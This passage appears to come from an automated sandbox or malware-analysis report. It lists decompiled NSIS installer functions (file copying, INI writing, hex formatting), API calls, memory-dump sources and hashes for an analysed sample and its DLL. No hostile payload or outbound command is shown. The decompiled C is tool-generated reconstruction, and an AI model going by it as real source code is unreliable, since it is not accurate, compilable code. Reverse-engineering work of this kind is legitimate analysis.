                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                    • Opcode ID: f70a225c52dc94088ec55034452069e5f0159b4652b3b317631306071439071b
                                                                                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                    • Opcode Fuzzy Hash: f70a225c52dc94088ec55034452069e5f0159b4652b3b317631306071439071b
                                                                                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402665, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00402665() {
				intOrPtr _t22;
				WCHAR* _t35;
				void* _t40;
				WCHAR* _t41;
				WCHAR* _t43;
				void* _t45;

				_t43 = E0040145C(_t40, _t35);
				_t41 = E0040145C(_t40, 0x11);
				_t22 = E0040145C(_t40, 0x23);
				_push(_t41);
				 *((intOrPtr*)(_t45 + 8)) = _t22;
				E004062CF(L"CopyFiles \"%s\"->\"%s\"", _t43);
				if(E00406301(_t43) != 0) {
					 *(_t45 - 0x5c) =  *(_t45 - 0xc);
					 *((intOrPtr*)(_t45 - 0x58)) = 2;
					 *((short*)(_t43 + 2 + lstrlenW(_t43) * 2)) = 0;
					 *((short*)(_t41 + 2 + lstrlenW(_t41) * 2)) = 0;
					_t28 =  *((intOrPtr*)(_t45 + 8));
					 *(_t45 - 0x54) = _t43;
					 *(_t45 - 0x50) = _t41;
					 *((intOrPtr*)(_t45 - 0x42)) =  *((intOrPtr*)(_t45 + 8));
					 *((short*)(_t45 - 0x4c)) =  *((intOrPtr*)(_t45 - 0x24));
					E00404F9E(_t35, _t28);
					if(SHFileOperationW(_t45 - 0x5c) != 0) {
						goto L2;
					}
				} else {
					L2:
					E00404F9E(0xfffffff9, _t35);
					 *((intOrPtr*)(_t45 - 4)) = 1;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t45 - 4));
				return 0;
			}









                                                                                                                                                    0x0040266d
                                                                                                                                                    0x00402676
                                                                                                                                                    0x00402678
                                                                                                                                                    0x0040267d
                                                                                                                                                    0x00402684
                                                                                                                                                    0x00402687
                                                                                                                                                    0x00402697
                                                                                                                                                    0x004026aa
                                                                                                                                                    0x004026ad
                                                                                                                                                    0x004026bc
                                                                                                                                                    0x004026c8
                                                                                                                                                    0x004026cd
                                                                                                                                                    0x004026d6
                                                                                                                                                    0x004026d9
                                                                                                                                                    0x004026dc
                                                                                                                                                    0x004026df
                                                                                                                                                    0x004026e3
                                                                                                                                                    0x004026f4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004026fa
                                                                                                                                                    0x00402699
                                                                                                                                                    0x00402699
                                                                                                                                                    0x0040269c
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                    • Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                                                                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                    • Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                                                                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406250, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00406250(void* __ecx, WCHAR* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				WCHAR* _v8;
				intOrPtr _v12;
				int _t22;
				void* _t31;
				signed int _t34;
				int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t44;

				_v8 = _a4;
				_t34 = 3;
				_t22 = _a8 / _t34;
				_t42 = 0;
				_v12 = 0;
				_t38 = _t22;
				if(_a16 <= _t38) {
					_t39 = _a16;
				} else {
					_t39 = _t38 - 1;
					_v12 = 1;
				}
				if(_t39 > _t42) {
					_t31 = _t39 - 1;
					do {
						asm("sbb eax, eax");
						_t22 = wsprintfW(_v8, L"%02x%c",  *(_t42 + _a12) & 0x000000ff,  ~(_t42 - _t31) & 0x00000020);
						_v8 =  &(_v8[3]);
						_t44 = _t44 + 0x10;
						_t42 = _t42 + 1;
					} while (_t42 < _t39);
				}
				if(_v12 != 0) {
					return lstrcatW(_a4, L"...");
				}
				return _t22;
			}












                                                                                                                                                    0x0040625a
                                                                                                                                                    0x00406264
                                                                                                                                                    0x00406265
                                                                                                                                                    0x00406267
                                                                                                                                                    0x00406269
                                                                                                                                                    0x0040626c
                                                                                                                                                    0x00406271
                                                                                                                                                    0x0040627d
                                                                                                                                                    0x00406273
                                                                                                                                                    0x00406273
                                                                                                                                                    0x00406274
                                                                                                                                                    0x00406274
                                                                                                                                                    0x00406282
                                                                                                                                                    0x00406285
                                                                                                                                                    0x00406288
                                                                                                                                                    0x0040628e
                                                                                                                                                    0x004062a4
                                                                                                                                                    0x004062aa
                                                                                                                                                    0x004062ae
                                                                                                                                                    0x004062b1
                                                                                                                                                    0x004062b2
                                                                                                                                                    0x004062b6
                                                                                                                                                    0x004062bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004062c7
                                                                                                                                                    0x004062ce

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                                    • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                    • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                    • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                    • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402713, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E00402713(WCHAR* __ebx) {
				int _t16;
				WCHAR* _t23;
				WCHAR* _t24;
				void* _t26;
				void* _t31;
				int _t37;

				_t23 = __ebx;
				 *(_t31 - 0x10) = __ebx;
				 *(_t31 - 0x14) = __ebx;
				 *(_t31 + 8) = __ebx;
				E00406035(0x4100f0, L"<RM>");
				_t16 = E00406035(0x4140f8, 0x4100f0);
				if( *((intOrPtr*)(_t31 - 0x2c)) != __ebx) {
					 *((intOrPtr*)(__ebp - 0x10)) = E0040145C(__edx, __ebx);
				}
				if( *((intOrPtr*)(_t31 - 0x28)) != _t23) {
					 *(_t31 - 0x14) = E0040145C(_t26, 0x11);
				}
				if( *((intOrPtr*)(_t31 - 0x1c)) != _t23) {
					 *(_t31 + 8) = E0040145C(_t26, 0x22);
				}
				_t24 = E0040145C(_t26, 0xffffffcd);
				_push(_t24);
				_push(0x4140f8);
				_push(0x4100f0);
				E004062CF(L"WriteINIStr: wrote [%s] %s=%s in %s", L"install");
				_t16 = WritePrivateProfileStringW( *(_t31 - 0x10),  *(_t31 - 0x14),  *(_t31 + 8), _t24);
				_t37 = _t16;
				if(_t37 == 0) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}









                                                                                                                                                    0x00402713
                                                                                                                                                    0x0040271e
                                                                                                                                                    0x00402721
                                                                                                                                                    0x00402724
                                                                                                                                                    0x00402727
                                                                                                                                                    0x00402733
                                                                                                                                                    0x0040273b
                                                                                                                                                    0x00402743
                                                                                                                                                    0x00402743
                                                                                                                                                    0x00402749
                                                                                                                                                    0x00402752
                                                                                                                                                    0x00402752
                                                                                                                                                    0x00402758
                                                                                                                                                    0x00402761
                                                                                                                                                    0x00402761
                                                                                                                                                    0x0040276b
                                                                                                                                                    0x0040276d
                                                                                                                                                    0x0040276e
                                                                                                                                                    0x0040276f
                                                                                                                                                    0x0040277a
                                                                                                                                                    0x0040278c
                                                                                                                                                    0x00401a0b
                                                                                                                                                    0x00401a0d
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                    • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$install
                                                                                                                                                    • API String ID: 247603264-573752738
                                                                                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405073, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65C4DF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 6E65C4F6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 6E65C506
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                    • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                                                                                                                    • API String ID: 1646373207-1378992308
                                                                                                                                                    • Opcode ID: 5421fa23c393c866239bdbd885e1410a3019472e2dbcb4c0da446a609de044fb
                                                                                                                                                    • Instruction ID: 610f317f79274adb97bba86f68524e3c5fd58911d52eaffc2b5b7cd10500b501
                                                                                                                                                    • Opcode Fuzzy Hash: 5421fa23c393c866239bdbd885e1410a3019472e2dbcb4c0da446a609de044fb
                                                                                                                                                    • Instruction Fuzzy Hash: 67F09031241607EFEF541FE1EC64BAB77E8EB16616F00402BB51289352CB718570C6A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E656769, Relevance: 6.1, APIs: 4, Instructions: 111windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E65A318: GetWindowLongW.USER32(?,000000F0), ref: 6E65A325
                                                                                                                                                    • GetClientRect.USER32 ref: 6E6567D8
                                                                                                                                                    • IsMenu.USER32 ref: 6E656815
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,00000000,00000000), ref: 6E656828
                                                                                                                                                    • GetClientRect.USER32 ref: 6E656875
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$ClientWindow$AdjustLongMenu
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3435883281-0
                                                                                                                                                    • Opcode ID: e674af311c89e4b933ee126db288085b5e283ae4f1ada3ad70cac25b19601890
                                                                                                                                                    • Instruction ID: b2068e3e7f437e9395b35ad1c6b025a05edb4e2328a6e9fd004aebc79b91fa49
                                                                                                                                                    • Opcode Fuzzy Hash: e674af311c89e4b933ee126db288085b5e283ae4f1ada3ad70cac25b19601890
                                                                                                                                                    • Instruction Fuzzy Hash: 3C313C71A10219AFDB00DFE9C958AAFBBBDEF49718B104469E801E7340DB30A910CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62B790, Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62B830
                                                                                                                                                      • Part of subcall function 6E62C970: _DebugHeapAllocator.LIBCPMTD ref: 6E62C97E
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62B885
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 571936431-0
                                                                                                                                                    • Opcode ID: 5ed2154393e7388afd994bd1cb2dfea859276ed5e5490bcec70c54b9b95e92c3
                                                                                                                                                    • Instruction ID: edc71f67acf7459b28ecb0bf8b74b6cf51e4e24826ae3e7cfdc7329bea7a9cad
                                                                                                                                                    • Opcode Fuzzy Hash: 5ed2154393e7388afd994bd1cb2dfea859276ed5e5490bcec70c54b9b95e92c3
                                                                                                                                                    • Instruction Fuzzy Hash: CC31E370D1020ADFCB04DFD4D850AEEB7B8FB19318F50492AD426AB294DB35AA44CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E672036, Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 457c9f3c61867d870b7236f27c5b65ebbd55ad6db76eb57b9855d1d604bdbb5c
                                                                                                                                                    • Instruction ID: ef9ddc1de0de5b99ef9e034a1ee29aadbe3feecb86e686634d73271460380bc5
                                                                                                                                                    • Opcode Fuzzy Hash: 457c9f3c61867d870b7236f27c5b65ebbd55ad6db76eb57b9855d1d604bdbb5c
                                                                                                                                                    • Instruction Fuzzy Hash: A721F671A90205FFDF309EE69C49B8A7BB8EB43364F214564E651DB280D7719C00C664
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6736CC, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,6E666340,00000000,6E62CB2E,?,?,6E66F469,?,?,?,?,6E62CB2E,00000000,00000000), ref: 6E6736D1
                                                                                                                                                    • _free.LIBCMT ref: 6E67372E
                                                                                                                                                    • _free.LIBCMT ref: 6E673764
                                                                                                                                                    • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,?,6E66F469,?,?,?,?,6E62CB2E,00000000,00000000,?,?,00000000), ref: 6E67376F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                    • Opcode ID: c2c5ad884fd03f681964ab48fef54791b975bead5838e0fffa8288eacd7557e5
                                                                                                                                                    • Instruction ID: 20bb22872049e199d2d8fa32fc099da2e4b68d5fe1e3b208ebdbf7e276b18a22
                                                                                                                                                    • Opcode Fuzzy Hash: c2c5ad884fd03f681964ab48fef54791b975bead5838e0fffa8288eacd7557e5
                                                                                                                                                    • Instruction Fuzzy Hash: 3311CA726C89076ADF711EFA4C8CDAB276DA7C777DB200524F124963D4EFA58C02452D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E639280, Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E6392FF
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E639319
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E639333
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E63934D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::bad_exception::bad_exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2160870905-0
                                                                                                                                                    • Opcode ID: 4d7c40e103ae06479b4bb82a13c966768492e0cc7505fc3bc187aa347ad32efc
                                                                                                                                                    • Instruction ID: 13d916af9af97bd075d7411971ae6e2f4a5114c713ad6fa291da5f29d14b6de9
                                                                                                                                                    • Opcode Fuzzy Hash: 4d7c40e103ae06479b4bb82a13c966768492e0cc7505fc3bc187aa347ad32efc
                                                                                                                                                    • Instruction Fuzzy Hash: 44216571900259EBCB04CFE8C890EEEB7BABF95304F14895DE5116B254DF31AA08DF14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E639100, Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E63917F
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E639199
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E6391B3
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 6E6391CD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::bad_exception::bad_exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2160870905-0
                                                                                                                                                    • Opcode ID: ed6b152248a79275db7b427da99ec375d96d00220ff998c5ae27f06da5c0bb12
                                                                                                                                                    • Instruction ID: a7b337799f84722d4891c22d15c94b37871a755ded8cf544ae927849b7830c93
                                                                                                                                                    • Opcode Fuzzy Hash: ed6b152248a79275db7b427da99ec375d96d00220ff998c5ae27f06da5c0bb12
                                                                                                                                                    • Instruction Fuzzy Hash: B9217F71900248EBCB08CFE4CC80EEE77BAAF94308F20885DE5116B259CF31AA08DF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65EAE5, Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 6E65EB07
